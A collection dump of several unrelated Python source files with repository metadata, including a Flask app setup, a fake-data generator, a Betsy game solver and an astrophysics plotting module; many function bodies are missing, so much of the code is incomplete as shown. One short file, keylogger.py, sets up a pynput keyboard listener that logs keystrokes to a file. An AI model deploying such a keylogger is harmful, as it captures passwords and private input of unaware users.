] | null | null | null | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
] | null | null | null | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
] | 1 | 2021-08-18T01:40:56.000Z | 2021-08-18T01:40:56.000Z | from typing import Text, Dict
import torch
from torch.utils.data import Dataset
| 16.333333 | 53 | 0.619448 |
3c6f84e2e28d5d42137620dfcf9d443aafcc4dc6 | 1,447 | py | Python | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from authlib.client.apps import github
from authlib.flask.client import OAuth
from etcd import Client
from flask import session
from flask_caching import Cache
from flask_mako import MakoTemplates
from flask_session import Session
from flask_sockets import Sockets
from flask_sqlalchemy import SQLAlchemy
from redis import Redis
from citadel.config import ZONE_CONFIG, REDIS_URL
from citadel.libs.utils import memoize
db = SQLAlchemy()
mako = MakoTemplates()
sockets = Sockets()
rds = Redis.from_url(REDIS_URL)
oauth = OAuth(fetch_token=fetch_token, update_token=update_token)
github.register_to(oauth)
cache = Cache(config={'CACHE_TYPE': 'redis'})
sess = Session()
| 27.301887 | 96 | 0.769178 |
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9 | 6,625 | py | Python | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | null | null | null | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | 2 | 2021-02-13T13:19:45.000Z | 2021-02-13T14:46:02.000Z | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | null | null | null | import json
import random
import os
import re
from faker import Faker
################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10
ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
"Computer Science",
"Chemistry",
"Biology",
"Physics",
"Religion",
"Sociology",
]
MODULE_PREFICES = [
"Topics of",
"Introduction to",
"Applied",
"Theorotical",
"Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]
fake = Faker("en-US")
fake.random.seed(654321)
################################################################################
basepath = os.path.join("defaults", "generated")
lecturer_ids = []
modules_by_field_of_study = {
field: [] for field in FIELDS_OF_STUDY
} # Dict with modules mapped to their field of study (to let generated data appear less random)
for i in range(ADMIN_COUNT):
write_to_file(
json_dump_dict(generate_student()), "admins", str(i).zfill(2) + ".json"
)
for i in range(STUDENT_COUNT):
write_to_file(
json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
)
for i in range(LECTURER_COUNT):
write_to_file(
json_dump_dict(generate_lecturer(lecturer_ids)),
"lecturers",
str(i).zfill(2) + ".json",
)
for i in range(EXAM_REG_COUNT):
write_to_file(
json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
"examRegs",
str(i).zfill(2) + ".json",
)
for i in range(COURSE_COUNT):
write_to_file(
json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
)
print("Done! ")
print(
"Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
)
)
| 30.113636 | 148 | 0.579019 |
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6 | 2,972 | py | Python | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 16 | 2021-06-03T07:16:15.000Z | 2022-03-24T13:07:31.000Z | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 6 | 2021-06-30T12:06:33.000Z | 2022-02-10T04:49:10.000Z | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 4 | 2021-07-04T14:21:56.000Z | 2021-08-23T19:55:06.000Z | ###LATTICE OPERATIONS
from .data_structure_definitions import *
| 33.393258 | 116 | 0.605316 |
3c71ada98a6d21e9df0e6b1ca11604cd29f59b82 | 2,949 | py | Python | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | 5 | 2019-05-24T05:19:55.000Z | 2020-07-29T13:21:49.000Z | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | null | null | null | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | 2 | 2019-07-01T02:14:04.000Z | 2020-07-29T13:21:53.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 11:34
# @Author : Hadrianl
# @File : widget
from vnpy.event import EventEngine, Event
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtWidgets, QtCore
from ..engine import APP_NAME
| 31.709677 | 84 | 0.665649 |
3c749728947c088616bb2bf3b46fdb1485731043 | 5,021 | py | Python | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
"""Redirect to login page if the user is not logged in (decorator)."""
return decorated_function
def include_user(f):
"""Take a u_id kwarg and return a user object (decorator)."""
return decorated_function
def user_required(f):
"""Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
return decorated_function
# ROUTES
| 28.050279 | 113 | 0.632344 |
3c7515d17c45501d0f2599188199dfb75f86e5a6 | 2,077 | py | Python | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ['SOURCE_URL']
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
| 32.968254 | 131 | 0.632162 |
3c761056de60be7b447d3aeb8075e25a0bb554cd | 1,278 | py | Python | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | 1 | 2019-12-28T05:25:01.000Z | 2019-12-28T05:25:01.000Z | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | 6 | 2019-12-28T01:12:25.000Z | 2022-03-12T00:10:08.000Z | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from nodaysoff.config import Config
# from flask_session import Session
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'primary'
mail = Mail()
| 30.428571 | 59 | 0.739437 |
3c768b97cd3aef1e83be11569f9ef43e98211953 | 695 | py | Python | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 1 | 2021-09-22T21:48:02.000Z | 2021-09-22T21:48:02.000Z | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 2 | 2018-01-19T18:46:35.000Z | 2019-04-09T22:59:46.000Z | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 6 | 2018-01-19T18:34:12.000Z | 2018-04-06T04:13:03.000Z | # scrip to test the lobpcg_sep eigenvalue solver
include("../src/lobpcg_sep.jl")
using LinearAlgebra
Ns = 100
k = 5 # number of eigenvectors
A = sqrt(Ns)*Diagonal(ones(Ns)) + rand(Ns, Ns)
A = 0.5*(A + A')
(e, X) = eigen(A)
# orthonormal starting guess of the eigenvectors
X0 = qr(rand(Ns, k + 6)).Q[:, 1:k+6]
#computing the lowest K eigenvalues
(eL, XL, it) = lobpcg_sep(A,X0, x-> x, k )
# printing the error
println("error on the computation the eigenvalues " * string(norm(eL - e[1:k])))
# now we use a preconditioner (the exact inverse)
Ainv = inv(A)
(eL1, XL1, it1) = lobpcg_sep(A,X0, x-> Ainv*x, k)
println("error on the computation the eigenvalues " * string(norm(eL1 - e[1:k])))
| 24.821429 | 81 | 0.667626 |
3c7727ecdb99959039e2a39114163de2e8432514 | 1,549 | py | Python | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | """
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98 | 78 | 0.551323 |
3c77652672bdfce35cef51c965f7b9c88501f504 | 1,181 | py | Python | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947 | 101 | 0.653683 |
3c78adc10fdbecc0bce8f85ff740740007a63985 | 276 | py | Python | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
with Listener(on_press=on_press) as listener:
listener.join() | 23 | 102 | 0.735507 |
3c797bad94039032f3ec8a0956509b976eb165dd | 1,372 | py | Python | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-11-02 09:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
| 45.733333 | 159 | 0.618076 |
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd | 2,687 | py | Python | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default="C:\programas\Programao\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file="C:\programas\Programao\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="N Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programao\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop() | 26.60396 | 106 | 0.671381 |
3c7b6e7f1356932087387fb61f2acb5391ed0b70 | 943 | py | Python | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | """
process_atac.py
Margaret Guo
04/15/2020
footprinting (.bed) --> csv)
notebooks
- make_hichip_df-withsnps-cancer-only
"""
#### FIX FOR HOCO
| 29.46875 | 104 | 0.69035 |
3c7b9bebae1fcd81af0109ae86287f833fb440e9 | 834 | py | Python | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | """
-------------------------------------------------
# @Project :
# @File :login
# @Date :2021/8/1 18:16
# @Author :
# @Email :1224069978
# @Software :PyCharm
-------------------------------------------------
"""
import hashlib,copy,requests
from conf.host import *
if __name__ == '__main__':
print(Login().login(user)) | 25.272727 | 55 | 0.52518 |
3c7be908e5d846fc839b0269f1d2587bd74e3afb | 409 | py | Python | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null |
# Supporting Module
# identities.py
| 15.148148 | 60 | 0.405868 |
3c7e63e11d96ab3935b8bb543acdf655bcf3abc1 | 14,296 | py | Python | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Design Decisions
# Heuristic : Heuristic tries to maximize the pieces of that particular player on top n rows
# Min-Max : Min-Max algorithm has been used
# IDS : Iterative deepening search has been used to move down the tree(depth:100)
# No Time Constrain : No time constrain has been taken.Instead the program prints move iteratively as it goes down the depth
# Dynamic Tree : Tree has been built dynamically to avoid recomputations
from itertools import combinations
import copy
from random import randrange, sample
import sys
import string
import Queue as queue
import sys
import time
n = int(sys.argv[1])
initial = sys.argv[3]
minutes = int(sys.argv[4])
move_person = sys.argv[2]
temp_n = n
# print initial
# n = 3
start = [[0 for x in range(n)] for y in range(n+3)]
count = 0
for i in range(n+3-1,-1,-1):
for j in range(0,n):
start[i][j] = initial[count]
count = count + 1
#print start
#start[5][0] = 'x'
#print start
#test = [['x', 'o', 'x'], ['x', 'x', 'x'], ['o', 'o', 'o'], ['x', 'x', '.'], ['.', '.', '.'], ['.', '.', '.']]
# move_person = 'o'
#Successor Function
# Check Goal State
#p = Node(test)
#for succ in succesor(test):
# p.add_child(succ[1])
#for c in p.children:
# print c
# Building Trees Dynamically
def solve(state):
# level = [[0 for x in range(0,10)] for y in range(0,10)]
# print state
# level[0][0] = Node(state)
# print level[0][0].data
# print level[0]
global move_person
global temp_n
temp_person = move_person
for i in range(2,100,2):
level = [[0 for x in range(0,10)] for y in range(0,10)]
level[0][0] = Node(state)
for j in range(0,i,1):
if j%2 == 0:
move_person = 'x'
else:
move_person = 'o'
# print level[j]
count = 0
for elem in level[j]:
count = count + 1
if elem != 0:
# print elem.data
for succ in succesor(elem.data):
# print succ
p = Node(succ[1])
p.father_i = j
p.father_k = count-1
p.move = succ[0]
elem.add_child(p)
level[j+1].append(p)
if temp_person == 'x':
for elem in level[i]:
if elem!= 0:
elem.current_max = heuristic(elem.data)
else:
for elem in level[i]:
if elem!= 0:
elem.current_min = heuristic(elem.data)
if temp_person == 'x':
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
else:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
if temp_person == 'x':
find = level[0][0].current_max
for elem in level[1]:
if elem!=0 and elem.current_min == find:
# print elem.data
# print 'Move:'
# print elem.move
# print elem.move,
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
else:
find = level[0][0].current_min
for elem in level[1]:
if elem!=0 and elem.current_max == find:
# print elem.data
# print 'Move:'
# print elem.move,
# print ' ',
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
# for elem in level[4]:
# if elem!=0:
# print elem.data,elem.current
solve(start)
| 54.773946 | 204 | 0.25007 |
3c80ebcea041e63107d9067c90a11c330c458c26 | 503 | py | Python | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | 1 | 2018-07-19T10:34:46.000Z | 2018-07-19T10:34:46.000Z | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | null | null | null | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | null | null | null | binary.memoize = {0: '0', 1: '1'}
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
| 33.533333 | 151 | 0.61829 |
3c81582355ba3220bcb59a6354b57fa7be7a46e7 | 17,422 | py | Python | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | """
Functions for plotting the signal to noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
